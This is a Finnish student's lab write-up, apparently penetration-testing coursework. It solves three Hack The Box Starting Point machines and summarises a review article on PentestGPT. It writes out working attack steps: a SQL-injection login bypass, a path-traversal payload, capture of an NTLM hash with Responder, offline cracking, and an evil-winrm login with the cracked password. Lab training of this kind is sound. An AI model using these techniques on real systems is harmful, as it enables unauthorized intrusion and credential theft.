Hack the box ja tanssitaan
// Muokkaus 7.5.2025 - lisäsin yhden responder tehtävän.
Tässä raportissa tutustumme hack-the-boxin pariin tehtävään. Käytämme jo opittuja kokonaisuuksia tähän. Raportin lopussa löytyy lyhenne jufo-arvioidusta kokonaisuudesta. Aloitetaan kuitenkin htb-tehtävällä.
Tanssit
Aloitetaan ensimmäinen tehtävä lataamalla vpn-yhteyden tiedosto htb järjestelmistä. Siirrän scpllä tiedoston kalin koneeseeni
scp /Users/henry/Downloads/starting_point_hneryi.ovpn henry@kali.koti:~
Tämän jälkeen avaan yhteyden - ja sivulle ”spawn the machine” tulee aktiiviseksi.
sudo openvpn starting_point_hneryi.ovpn

Tästä saan koneeni ip-osoitteen (10.129.188.249) johon voin suoraan aloittaa ensimmäisenä vaikkapa nmap skannauksen.
sudo nmap -sV 10.129.188.249

Vastauksena saan, että 23/tcp portti on auki telnet yhteydelle. Yritetään ottaa yksinkertainen root yhteys tähän.
telnet 10.129.188.249 23
## 23 on portti jolla yhteys otetaan.
Yhteydestä löytyvä lippu merkataan htb materiaaleihin.

Odotushuone.
Googlaan itseni suoraan koneeseen, otan yhteyden vpn yhteydellä ja aloitan koneen.
Teen saman nmap skannauksen ja huomaan, että suojaamaton apache-yhteys on päällä.
80/tcp open http Apache httpd 2.4.38 ((Debian))
Katson CURLilla, että jotain on sivulla ja menen suoraan selaimella sivulle.

Kyseessä siis jonkin sortin kirjautumissivu. Yritetään siis vaikka rikkoa tämä.
Yritän muutamaa ideaa, jotka varmasti aika yleisiä. Eli admin/admin, root/admin kokonaisuuksia ym.
Katson curlin uudestaan läpi, enkä löydä tästä oikein mitään merkillistä.
Tämän jälkeen ajattelin kokeilla lisätä kommentin admin kirjautumisen perään (jolloin seuraava rivi on kommentti).
admin ‘ #
Ja salasanaksi kokeilin admin.
Tämä ratkaisee tehtävän. Buuu. Olisin mielelläni tehnyt tätä vähän pidempääkin.

Vastaaja / Responder
Aloitetaan tässäkin nmap skannauksella.

Huomataan taas, että apache palvelin on päällä. Nyt kyseessä windows palvelin jossa 5985 jotain ikkunoihin liittyvää. Huomaan että kuitenkin kyseessä myös openssl ja php palvelin. Eli nämä myös käytössä.
Kokeillaan curlilla ja huomataan, että ohjaus unika.htb sivustoon.

Yritän avata sivua selaimella, mutta tämä ei löydä mitään. Hetken mietin asiaa. Kokeilen lisätä host tiedostoon sivuston.
sudoedit /etc/hosts
10.129.169.34 unika.htb

Ja tällä saimme sivun auki! Tiedämme, että kyseessä on php sivusto niin kokeilen vaihtaa kieltä sivustolta jotta selvitän syntaksiformaatin.
http://unika.htb/index.php?page=german.html
Eli page= on syntaksi tähän.
HTB kokeilee pyytämään komentoja lokaaliin hakuun ja ”../../../../../../../../windows/system32/drivers/etc/hosts” toimii koneessa.
Tästä voidaan päätellä, että RFI (remote) haussa ikkunoiden 10.10.14.6/somefile toimisi.
Selvitetään oma verkkotunneli kuitenkin ensin
ip addr show | grep tun

Tähän voidaan käyttää responder työkalua joka toimii välissä oma-asettamin ehdoin. Käyn läpi dokumentaation ja tutustun työkaluun. Laitetaan päälle ip-osoitteeni tunneliin.
sudo responder -I tun0
# -I merkkaa rajapinnan ja
# tun0 on tehtävän tunneli
Tällä saan hashin tehtävälle - ajan tämän suoraan edellisen tehtävän john-the-ripperin läpi. Ja salasana on badminton.
Käytän Evil-WinRM Windowsin omaan protokollaan pääsemiseen. Täällä sanotaan, että portti 5985 on yleinen joten sillä mennään htb kysymykseen.
evil-winrm -i 10.129.182.88 -u administrator -p badminton
Käyn läpi kansioita ’dir’ komennoilla kunnes löydän ’C:\Users\mike\desktop’ työpöydältä ’flag.txt’ tiedoston jossa sisällä vastaus ’ea81b7afddd03efaa0945333ed147fac’

Kommentit
HackTheBox on oiva työkalu opetella hakkeroimaan laatikoita. Olen tässä itsekin näitä jo tovin tehnyt, joten nämä ehkä olivat siitä helpommasta päästä.
Tekstiä ja arvioita.
Karvinen 2025 // Start Your Research with a Review Article
Miksi katsausartikkeli on tärkeä tutkimuksen alussa? -Artikkelit kokoavat yhteen olemassa olevaa tietoa kyseisestä aiheesta. Ne tarjoavat laajan yleiskuvan, esittelevät keskeiset käsitteet, metodit ja tähänastiset tutkimustulokset. -Ne auttavat tunnistamaan tutkimusalueen nykytilan, merkittävät aukot tutkimuksen tiedoissa (research gaps) ja mahdolliset tulevaisuuden tutkimussuunnat. -Lukemalla katsausartikkelin voi nopeasti päästä kärryille aiheesta ilman, että tarvitsee kahlata läpi lukemattomia yksittäisiä tutkimuspapereita. -Hyödyllinen erityisesti opinnäytetyötä tai uutta tutkimusprojektia aloittaessa. Ei tarvitse "keksi pyörää uudelleen".
Usein uuteen aiheeseen perehtyessä tuntuu, että tietoa on valtavasti ja on vaikea tietää, mistä aloittaa. Artikkelit toimii hyvänä aloituspisteenä ja auttaa suuntaamaan omaa oppimista ja mahdollista tutkimusta. Nämä myös vahvistavat, että on ymmärtänyt alan keskeiset peruspilarit jolla mennä eteenpäin.
Todella mielenkiintoinen katsaus LLM/transformer mallien käyttömahdollisuuksista tietoturvassa. Artikkeli on vuodelta 2024 ja on JUFO tasolta 1
- Tässä esitellään PentestGPT järjestelmää joka hyödyntäisi kielimalleja järjestelmätestaukseen.
- Tavoitteena on mahdollistaa itsenäisiä hyökkäyspolkujen totetuksia hyödyntämällä transformer mallien kykyä tulkita tuloksia ja muotoilla loogisia jatkoja näille.
- Pentest voisi itse käyttää työkaluja kuten esimerkiksi nmap toteutuksessa.
- Tutkimuksessa myös arvioitu työkalua OSCP labrahaasteisiin jossa onnistumisaste oli yli 70%. Tämä lähellä mediaanitestaajaa.
Mallia ei saatu vielä täysin itsenäiseksi, mutta toimii jo nyt hyvänä pohjana puoliautomaattiseen hyödyntämiseen tai oppimiskäytäntöön.
LLM mallit ovat nyt huonoimpia mitä ne koskaan tulevat olemaan. Tämä kokonaisuus on vahva huomio siitä mihin tulevaisuudessa ollaan menossa.
Linkit ja lähteet.
https://terokarvinen.com/tunkeutumistestaus/#h5-kohti-omaa-treenia https://terokarvinen.com/review-article/ https://jfp.csc.fi/jufoportaali https://app.hackthebox.com/ https://www.usenix.org/system/files/usenixsecurity24-deng.pdf https://www.kali.org/tools/responder/ https://github.com/Hackplayers/evil-winrm
Käytetty aika HTB testit 1h 15min Tutkimukset, artikkelit ja pohjatyö 3h Yhteensä 4h 15min